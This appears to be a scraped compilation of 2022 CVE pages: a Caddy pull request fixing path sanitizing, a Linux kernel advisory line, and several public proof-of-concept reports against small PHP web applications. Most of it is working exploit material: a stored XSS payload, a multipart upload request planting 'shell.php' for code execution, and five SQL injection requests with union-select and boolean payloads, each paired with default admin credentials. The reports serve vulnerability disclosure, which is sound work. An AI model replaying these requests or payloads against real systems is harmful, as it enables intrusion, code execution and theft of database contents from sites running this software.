Caddy v2.4 was discovered to contain an open redirect vulnerability. A remote unauthenticated attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Conversation 1 Commits 1 Checks 20 Files changed

**Conversation**

This is a followup to #4407, in response to a report on the forums: https://caddy.community/t/php-fastcgi-phishing-redirection/14542

Turns out that doing TrimRight to remove trailing dots, _before_ cleaning the path, will cause double-dots at the end of the path to not be cleaned away as they should. We should instead remove the dots _after_ cleaning.

This is a followup to #4407, in response to a report on the forums: https://caddy.community/t/php-fastcgi-phishing-redirection/14542

Turns out that doing \`TrimRight\` to remove trailing dots, \_before\_ cleaning the path, will cause double-dots at the end of the path to not be cleaned away as they should. We should instead remove the dots \_after\_ cleaning.

Copy link

Member

** **mholt** left a comment**

Ah, nice. Simple and elegant fix, LGTM. Thank you

nordstern pushed a commit to uptimerobot/caddy that referenced this issue

Jan 24, 2022

2 participants

CVE-2022-29718: caddyhttp: Fix `MatchPath` sanitizing by francislavoie · Pull Request #4499 · caddyserver/caddy

net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free.

CVE-2022-32250: security - Linux Kernel use-after-free write in netfilter

A vulnerability was found in SourceCodester Product Show Room Site 1.0. It has been declared as problematic. This vulnerability affects p=contact. The manipulation of the Message textbox with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely but requires authentication. Exploit details have been disclosed to the public.

**Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)****Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code****Version: Product Show Room Site 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.

**Payload used:**

<script>alert(111)</script>

**Proof of Concept**

1.  Login the CMS. Default Admin Access Username: admin Password: admin123
    
2.  Open Page http://172.24.5.107/psrs/?p=contact
    
3.  Put XSS payload (<script>alert(111)</script>) in the Message box and click on Send Message to publish the page  
    
4.  Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries page,We can see the alert.

CVE-2022-1979: webray.com.cn/'Message' Stored Cross-Site Scripting(XSS).md at main · Xor-Gerke/webray.com.cn

Car Rental Management System v1.0 is vulnerable to Arbitrary code execution via car-rental-management-system/admin/ajax.php?action=save_car.

Permalink

Cannot retrieve contributors at this time

**Car Rental Management System v1.0 has arbitrary code execution (RCE)**

vendor: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability url: ip/car-rental-management-system/admin/ajax.php?action=save\_car

Request package for file upload：

POST /car\-rental\-management\-system/admin/ajax.php?action\=save\_car HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/car-rental-management-system/admin/index.php?page=manage\_car&id=6
Content-Length: 1107
Content-Type: multipart/form-data; boundary=---------------------------16501296121152
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close
\-----------------------------16501296121152
Content-Disposition: form-data; name="id"
6
\-----------------------------16501296121152
Content-Disposition: form-data; name="brand"
1
\-----------------------------16501296121152
Content-Disposition: form-data; name="model"
1
\-----------------------------16501296121152
Content-Disposition: form-data; name="category\_id"
6
\-----------------------------16501296121152
Content-Disposition: form-data; name="engine\_id"
3
\-----------------------------16501296121152
Content-Disposition: form-data; name="transmission\_id"
3
\-----------------------------16501296121152
Content-Disposition: form-data; name="description"
111
\-----------------------------16501296121152
Content-Disposition: form-data; name="price"
10
\-----------------------------16501296121152
Content-Disposition: form-data; name="qty"
110
\-----------------------------16501296121152
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/pdf
JFJF
<?php phpinfo();?>
\-----------------------------16501296121152--

The files will be uploaded to this directory \\admin\\assets\\uploads\\cars\_img  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-32019: bug_report/RCE-1.md at main · k0xx11/bug_report

Badminton Center Management System v1.0 is vulnerable to SQL Injection via /bcms/admin/?page=sales/view_details&id.

**Badminton Center Management System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15318/badminton-center-management-system-phpoop-free-source-code.html

Current database name: bcms\_db,length is 7

Vulnerability File: /bcms/admin/?page=sales/view\_details&id=

Vulnerability location: /bcms/admin/?page=sales/view\_details&id=, id

\[+\] Payload: /bcms/admin/?page=sales/view\_details&id=6%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /bcms/admin/?page\=sales/view\_details&id\=6%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qq2e8htekg3g2rkgtbq38p0jnv
Connection: close

When length (database ()) = 6, Content-Length: 28921 

When length (database ()) = 7, Content-Length: 29893

CVE-2022-31994: bug_report/SQLi-9.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/company/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/company/index.php?view=edit&id=

Vulnerability location: /eris/admin/company/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/company/index.php?view=edit&id=-3%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /eris/admin/company/index.php?view\=edit&id\=\-3%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32007: bug_report/SQLi-2.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via eris/admin/vacancy/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/vacancy/index.php?view=edit&id=

Vulnerability location: /eris/admin/vacancy/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/vacancy/index.php?view=edit&id=-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /eris/admin/vacancy/index.php?view\=edit&id\=\-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32008: bug_report/SQLi-3.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/applicants/index.php?view=view&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/applicants/index.php?view=view&id=

Vulnerability location: /eris/admin/applicants/index.php?view=view&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/applicants/index.php?view=view&id=-2%27%20union%20select%201,2,3,4,5,6,database(),8,9,10,11--+ // Leak place ---> id

GET /eris/admin/applicants/index.php?view\=view&id\=\-2%27%20union%20select%201,2,3,4,5,6,database(),8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32011: bug_report/SQLi-5.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/user/index.php?view=edit&id=.

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/user/index.php?view=edit&id=

Vulnerability location: /eris/admin/user/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/user/index.php?view=edit&id=-00018%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /eris/admin/user/index.php?view\=edit&id\=\-00018%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

CVE-2022-32010: bug_report/SQLi-7.md at main · k0xx11/bug_report

Complete Online Job Search System v1.0 is vulnerable to SQL Injection via eris/admin/category/index.php?view=edit&id=.

Permalink

Cannot retrieve contributors at this time

**Complete Online Job Search System v1.0 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/category/index.php?view=edit&id=

Vulnerability location: /eris/admin/category/index.php?view=edit&id=,id

Current database name: erisdb

\[+\] Payload: /eris/admin/category/index.php?view=edit&id=-24%27%20union%20select%201,database()--+ // Leak place ---> id

GET /eris/admin/category/index.php?view\=edit&id\=\-24%27%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=mho0fs263l0tis8l6v3lqpu6q4
Connection: close

Tag

#php